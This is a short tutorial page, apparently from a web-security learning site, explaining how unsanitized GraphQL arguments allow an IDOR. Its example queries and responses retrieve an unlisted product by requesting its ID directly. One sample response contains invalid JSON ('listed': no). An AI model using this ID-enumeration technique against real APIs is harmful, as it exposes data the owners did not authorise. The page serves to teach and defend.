Exploiting Unsanitized Arguments

For a general explanation of GraphQL arguments, see Arguments.
For further information on IDORs, see Insecure direct object references (IDOR).

For example, the query below requests a product list for an online shop:

 #Example product query

    query {
        products {
            id
            name
            listed
        }
    }

The product list returned contains only listed products.

#Example product response

    {
        "data": {
            "products": [
                {
                    "id": 1,
                    "name": "Product 1",
                    "listed": true
                },
                {
                    "id": 2,
                    "name": "Product 2",
                    "listed": true
                },
                {
                    "id": 4,
                    "name": "Product 4",
                    "listed": true
                }
            ]
        }
    }

By querying the ID of the missing product, we can get its details, even though it is not listed on the shop and was not returned by the original product query.

#Query to get missing product

    query {
        product(id: 3) {
            id
            name
            listed
        }
    }

 #Missing product response

    {
        "data": {
            "product": {
            "id": 3,
            "name": "Product 3",
            "listed": no
            }
        }
    }

PreviousGraphQL API Vulnerabilities NextDiscovering Schema Information

Last updated 1 year ago

Was this helpful?